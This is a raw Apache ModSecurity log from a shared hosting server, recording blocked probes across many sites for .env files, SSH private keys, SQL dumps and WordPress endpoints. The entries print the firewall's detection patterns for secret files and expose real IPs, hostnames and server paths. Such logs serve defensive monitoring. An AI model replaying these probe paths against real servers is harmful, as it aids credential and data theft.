[Tue May 26 14:54:58.464903 2026] [security2:error] [pid 662057:tid 662191] [client 154.161.32.97:57068] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVm6vT3lMm9tGFVg9ROPAAAAQ4"]
[Tue May 26 14:54:58.982193 2026] [security2:error] [pid 658374:tid 658519] [client 62.60.130.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVm6Z1Mb7_aby-E0KcyQwAADyg"]
[Tue May 26 14:54:59.276507 2026] [security2:error] [pid 658374:tid 658431] [remote 62.60.130.227:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/xmlrpc.php"] [unique_id "ahVm651Mb7_aby-E0KcyZQAAaDg"]
[Tue May 26 14:54:59.296964 2026] [security2:error] [pid 658374:tid 658619] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm6p1Mb7_aby-E0KcyYQAAAHM"]
[Tue May 26 14:54:59.446225 2026] [security2:error] [pid 658374:tid 658435] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVm651Mb7_aby-E0KcybQAANzw"]
[Tue May 26 14:54:59.614218 2026] [security2:error] [pid 658374:tid 658421] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVm651Mb7_aby-E0KcycwAAHi4"]
[Tue May 26 14:54:59.783288 2026] [security2:error] [pid 658374:tid 658419] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVm651Mb7_aby-E0KcydQAANSw"]
[Tue May 26 14:54:59.951916 2026] [security2:error] [pid 658374:tid 658437] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVm651Mb7_aby-E0KcydwAAKz4"]
[Tue May 26 14:55:00.120325 2026] [security2:error] [pid 658374:tid 658397] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7J1Mb7_aby-E0KcyfQAABBY"]
[Tue May 26 14:55:00.288474 2026] [security2:error] [pid 658374:tid 658420] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7J1Mb7_aby-E0KcygAAAQi0"]
[Tue May 26 14:55:00.793691 2026] [security2:error] [pid 662057:tid 662132] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7PT3lMm9tGFVg9ROSQABC0o"]
[Tue May 26 14:55:00.970437 2026] [security2:error] [pid 658374:tid 658423] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7J1Mb7_aby-E0KcykwAAPDA"]
[Tue May 26 14:55:01.138638 2026] [security2:error] [pid 658374:tid 658392] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7Z1Mb7_aby-E0KcymgAAYRE"]
[Tue May 26 14:55:01.308575 2026] [security2:error] [pid 658374:tid 658436] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7Z1Mb7_aby-E0KcyngAAYD0"]
[Tue May 26 14:55:01.479127 2026] [security2:error] [pid 658374:tid 658440] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7Z1Mb7_aby-E0KcyogAAc0E"]
[Tue May 26 14:55:01.648612 2026] [security2:error] [pid 658374:tid 658461] [remote 62.60.130.227:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "digitalgerminate.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVm7Z1Mb7_aby-E0KcypwAAFFY"]
[Tue May 26 14:55:02.057607 2026] [security2:error] [pid 658374:tid 658561] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm7Z1Mb7_aby-E0KcypgAAADk"]
[Tue May 26 14:55:02.440731 2026] [security2:error] [pid 658374:tid 658573] [client 45.148.10.5:43488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/dump.sql"] [unique_id "ahVm7p1Mb7_aby-E0KcyvgAAAEU"]
[Tue May 26 14:55:03.675071 2026] [security2:error] [pid 662057:tid 662246] [client 5.255.115.88:36232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.env.old"] [unique_id "ahVm7_T3lMm9tGFVg9ROZQAAAUU"]
[Tue May 26 14:55:03.675194 2026] [security2:error] [pid 658374:tid 658600] [client 5.255.115.88:36064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVm751Mb7_aby-E0Kcy4QAAAGA"]
[Tue May 26 14:55:03.675502 2026] [security2:error] [pid 662057:tid 662303] [client 5.255.115.88:36092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVm7_T3lMm9tGFVg9ROWAAAAX4"]
[Tue May 26 14:55:03.677775 2026] [security2:error] [pid 662057:tid 662187] [client 5.255.115.88:35968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.env.backup"] [unique_id "ahVm7_T3lMm9tGFVg9ROaAAAAQo"]
[Tue May 26 14:55:03.679649 2026] [security2:error] [pid 662057:tid 662276] [client 5.255.115.88:36042] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/backend/.env"] [unique_id "ahVm7_T3lMm9tGFVg9ROaQAAAWM"]
[Tue May 26 14:55:03.749218 2026] [security2:error] [pid 662057:tid 662248] [client 5.255.115.88:35984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.env.bak"] [unique_id "ahVm7_T3lMm9tGFVg9ROhAAAAUc"]
[Tue May 26 14:55:03.762991 2026] [security2:error] [pid 662057:tid 662292] [client 5.255.115.88:36020] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/api/.env"] [unique_id "ahVm7_T3lMm9tGFVg9ROhgAAAXM"]
[Tue May 26 14:55:03.769997 2026] [security2:error] [pid 662057:tid 662211] [client 5.255.115.88:36048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/public/.env"] [unique_id "ahVm7_T3lMm9tGFVg9ROiAAAASI"]
[Tue May 26 14:55:03.832697 2026] [security2:error] [pid 658374:tid 658546] [client 5.255.115.88:36044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/app/.env"] [unique_id "ahVm751Mb7_aby-E0Kcy-QAAACo"]
[Tue May 26 14:55:03.834012 2026] [security2:error] [pid 662057:tid 662197] [client 5.255.115.88:35938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "aastha-enterprises.com"] [uri "/.env"] [unique_id "ahVm7_T3lMm9tGFVg9ROjgAAARQ"]
[Tue May 26 14:55:04.300732 2026] [security2:error] [pid 662057:tid 662277] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm7_T3lMm9tGFVg9ROkgAAAWQ"]
[Tue May 26 14:55:04.720186 2026] [security2:error] [pid 658374:tid 658539] [client 114.119.148.237:50731] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVm8J1Mb7_aby-E0KczHgAAACM"], referer: http://haddingtonwines.com/cart?remove_item=fd95ec8df5dbeea25aa8e6c808bad583
[Tue May 26 14:55:06.642688 2026] [security2:error] [pid 662057:tid 662275] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm8vT3lMm9tGFVg9ROxgAAAWI"]
[Tue May 26 14:55:08.265020 2026] [security2:error] [pid 658374:tid 658600] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm851Mb7_aby-E0KczVAAAAGA"]
[Tue May 26 14:55:08.926581 2026] [security2:error] [pid 662057:tid 662267] [client 45.148.10.5:39740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/backup.sql"] [unique_id "ahVm9PT3lMm9tGFVg9RO4gAAAVo"]
[Tue May 26 14:55:09.428376 2026] [security2:error] [pid 662057:tid 662283] [client 103.155.167.193:61093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.167.155.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-login.php/wp-login.php"] [unique_id "ahVm9fT3lMm9tGFVg9RO4wAAAWo"]
[Tue May 26 14:55:11.304080 2026] [security2:error] [pid 662057:tid 662312] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm9vT3lMm9tGFVg9RO7QAAAYc"]
[Tue May 26 14:55:12.520138 2026] [security2:error] [pid 658374:tid 658550] [client 114.119.135.96:30345] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/product-enquiry/"] [unique_id "ahVm-J1Mb7_aby-E0KczkwAAAC4"], referer: https://www.anujoverseas.in/product-enquiry/
[Tue May 26 14:55:12.568601 2026] [security2:error] [pid 662057:tid 662250] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm-PT3lMm9tGFVg9RO-AAAAUk"]
[Tue May 26 14:55:13.206337 2026] [security2:error] [pid 662057:tid 662281] [client 45.148.10.5:1226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/db.sql"] [unique_id "ahVm-fT3lMm9tGFVg9RPDQAAAWg"]
[Tue May 26 14:55:15.714810 2026] [security2:error] [pid 662057:tid 662194] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm-_T3lMm9tGFVg9RPGwAAARE"]
[Tue May 26 14:55:16.661302 2026] [autoindex:error] [pid 658374:tid 658527] [client 20.17.176.186:0] AH01276: Cannot serve directory /home1/omshriin/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:55:17.748323 2026] [security2:error] [pid 662057:tid 662314] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm_fT3lMm9tGFVg9RPNQAAAYk"]
[Tue May 26 14:55:19.240438 2026] [security2:error] [pid 658374:tid 658502] [remote 74.7.241.58:49296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVm_51Mb7_aby-E0Kc0FgAAEH8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:55:20.123113 2026] [security2:error] [pid 658374:tid 658546] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm_51Mb7_aby-E0Kc0JAAAACo"]
[Tue May 26 14:55:21.400064 2026] [security2:error] [pid 658374:tid 658460] [remote 45.32.67.165:56114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVnAZ1Mb7_aby-E0Kc0TQAAe1U"]
[Tue May 26 14:55:21.961655 2026] [security2:error] [pid 658374:tid 658540] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnAJ1Mb7_aby-E0Kc0PQAAACQ"], referer: https://www.anujtradingco.com/
[Tue May 26 14:55:22.433563 2026] [security2:error] [pid 658374:tid 658561] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnAp1Mb7_aby-E0Kc0ZAAAADk"]
[Tue May 26 14:55:22.745860 2026] [security2:error] [pid 662057:tid 662303] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnAvT3lMm9tGFVg9RPWAAAAX4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1287715&moderation-hash=91a889ac70362414dd8d3d7063359890
[Tue May 26 14:55:23.217117 2026] [security2:error] [pid 658374:tid 658524] [client 85.208.96.205:23954] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahVnA51Mb7_aby-E0Kc0fgAAABQ"]
[Tue May 26 14:55:23.217287 2026] [security2:error] [pid 658374:tid 658524] [client 85.208.96.205:23954] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahVnA51Mb7_aby-E0Kc0fgAAABQ"]
[Tue May 26 14:55:24.067491 2026] [security2:error] [pid 658374:tid 658600] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnA51Mb7_aby-E0Kc0iAAAAGA"]
[Tue May 26 14:55:24.969570 2026] [security2:error] [pid 658374:tid 658523] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVnBJ1Mb7_aby-E0Kc0owAAABM"], referer: https://anujtradingco.com
[Tue May 26 14:55:26.222057 2026] [security2:error] [pid 662057:tid 662280] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnBfT3lMm9tGFVg9RPfwAAAWc"]
[Tue May 26 14:55:27.773018 2026] [ssl:error] [pid 658374:tid 658576] [client 13.219.121.241:26018] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname d2cargo.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:55:28.571017 2026] [security2:error] [pid 658374:tid 658511] [client 31.210.168.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnCJ1Mb7_aby-E0Kc03wAAAAc"]
[Tue May 26 14:55:29.394621 2026] [security2:error] [pid 662057:tid 662291] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnCPT3lMm9tGFVg9RPkAAAAXI"]
[Tue May 26 14:55:31.294903 2026] [security2:error] [pid 658374:tid 658582] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnCp1Mb7_aby-E0Kc1MQAAAE4"]
[Tue May 26 14:55:33.512102 2026] [security2:error] [pid 658374:tid 658513] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVnDZ1Mb7_aby-E0Kc1XwAAAAk"]
